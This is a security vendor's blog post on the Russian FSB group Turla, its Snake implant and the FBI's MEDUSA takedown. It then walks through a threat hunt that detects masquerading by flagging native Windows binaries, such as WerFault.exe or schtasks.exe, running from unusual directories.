Russia has long been a military power, a nuclear power, a space power and in recent decades, a cyber power. It has been one of the most capable cyber actors, going back to the late 1990s when Russian state hackers stole classified documents and military research from U.S. universities and government agencies. The stolen documents, if stacked on top of one another, would have been taller than the Washington Monument (555 feet or 169 meters). These incidents, dubbed “Moonlight Maze” as described in Thomas Rid’s book “Rise of the Machines,” marked one of the world’s first advanced persistent threat (APT) attacks. Russia’s intelligence and security agencies continue to operate highly skilled groups of offensive attackers. Those APT groups are spread across its intelligence and security agencies and the Ministry of Defense. They engage in a broad range of cyber and influence operations tied to Russia’s strategic objectives. These include exploiting adversary systems, establishing footholds, conducting cyber espionage operations and running disinformation and misinformation campaigns designed to undermine Western narratives. One of the most effective and long-running Russian groups is Turla, a unit known as Center 16 housed within Russia’s Federal Security Service, or FSB. Researchers found that this group, which is active today, may have been connected with Moonlight Maze.
In 2023, the U.S. Department of Justice announced a counterintelligence operation called MEDUSA that targeted one of Turla’s most sophisticated tools: an extremely stealthy peer-to-peer malware network called Snake. The U.S. government had investigated Snake and malware associated with Snake for almost 20 years. The investigation included monitoring FSB officers at a facility in Ryazan, Russia, who ran daily operations with Snake. The malware and botnet was used to swipe military documents, compromise journalists, infiltrate critical infrastructure and steal secrets of interest to Russia.
Turla regularly upgraded Snake to ensure it remained what the U.S. called “the FSB’s most sophisticated long-term cyber espionage malware implant.” Snake had a modular design that allowed for concise updating of its components and was cross-platform, running on Windows, macOS and Linux. The Cybersecurity Infrastructure and Security Agency (CISA) said the malware had “a rare level of stealth.” It acted as its own botnet, routing stolen data through other infected machines in a way to avoid monitoring and the alerting of signal intelligence services. In the course of studying Snake, the FBI figured out how to decrypt and decode its communications. The agency created a tool called PERSEUS that could communicate with infected machines. This gave the FBI an opportunity: destroy Snake’s network. The FBI asked for and a federal judge granted authorization to issue commands to Snake-infected computers that caused the malware to disable itself, marking a massive success in turning an invasive tool against itself. Russia will invariably retool, but the dismantling of Snake marked a significant blow.
Turla is still an active threat group. In this threat hunting case study, we’ll demonstrate how to use a hunt package in the Community Edition of HUNTER471 to hunt for a common persistence behavior associated with Turla.
Hunting Turla
Threat hunts start with strong intelligence about the attack behaviors of an adversary. In May 2023, the Five Eyes intelligence partners published an advisory describing the tactics, techniques and procedures (TTPs) used by Turla with its Snake implant. Once Snake infected a system, the malware created a service named “WerFaultSvc.” Executing it started the process of decrypting Snake's components and loading them into memory on the victim's machine. According to the advisory, the purpose of this executable is to mimic “WerFault.exe,” which is a native Windows executable, sometimes referred to as a living-off-the-land binary, or LOLBin. By giving malicious components of their malware similar names as legitimate Windows binaries, attackers aim to escape scrutiny by masquerading security tools and analysts. We can explore this tactic more within MITRE ATT&CK, which is the knowledge base of tactics and techniques used by adversaries. Masquerading is a sub-technique that falls under the broad category of defense evasion.
When we expand the menu of sub-techniques, we see Turla’s exact behavior described in sub-technique T1036.005: “Match Legitimate Name or Location.”
During boot, Snake’s version of “WerFault.exe” is executed from the %windows%\WinSxS\ directory. The legitimate binary is normally found in the Windows System32 or the SYSWOW64 directory. This blending can be effective if analysts are not examining a binary’s absolute file path. But even if a malicious component has a similar or the same name, there are clues that can be searched for that give it away.
We can use this behavior as a starting point for a threat hunt. Our analysts have written a threat hunting package for HUNTER471 that is designed to identify when native Windows executables are moved or are copied out of their native directories and placed elsewhere, possibly for the purpose of masquerading. This particular hunt package is called “Copying Files from Native Windows Directory for Masquerading” and it is available for free within the Community Edition of HUNTER471. This hunt package is compatible with endpoint detection and response (EDR) and logging systems including CrowdStrike, Microsoft Defender, Palo Alto Cortex XDR, SentinelOne, Splunk and Trend Micro Vision One.
The query logic table shows how this hunt works. In it, there is a large list of native Windows LOLBins that ship with every Windows system. Normally, we would not rely on naming conventions that threat actors use for components of their malware. Names of malicious components are unreliable indicators of compromise (IoCs) because adversaries can easily change the names of their payloads, such as “1.bat,” “2.bat,” “3.bat” and so on. If the adversary can control a name, they'll change it. To blend in, attackers will pick names that already exist in an environment. Turla is using the masquerading technique, so the name of a Windows LOLBin will be used. Thus, it’s a very large query as seen in this example hunt in Splunk below.
The most important part of this System Monitor (sysmon) query in Splunk is in the first condition. To prevent an overwhelming number of false positives, we need to exclude LOLBins in file paths that are in their normal, expected places. In this query, we eliminate native binaries in System32 or SYSWOW64.
What kind of results should be flagged from this query for further investigation? The first result involves the LOLBin “schtasks.exe,” or scheduled tasks.
Why did this trigger a result? In this case, the absolute file path is displayed, which shows “schtasks.exe” is running from the user’s public directory, an abnormal location. Adversaries love to abuse the public directory because it’s a location where there’s usually no important data and it often escapes scrutiny. The results also turn up the command-line arguments whose parameters are not normally expected with scheduled tasks. This is suspicious and should be fully investigated. To get closer to the root cause of this activity, threat hunters should identify the parent process that is executing “schtasks.exe” to push the investigation further.
This guide to threat hunting for Turla is also available on video here. Also, register for the Community Edition of our threat hunting platform, HUNTER471, where a number of free sample threat hunts are available. Stay safe and happy hunting!
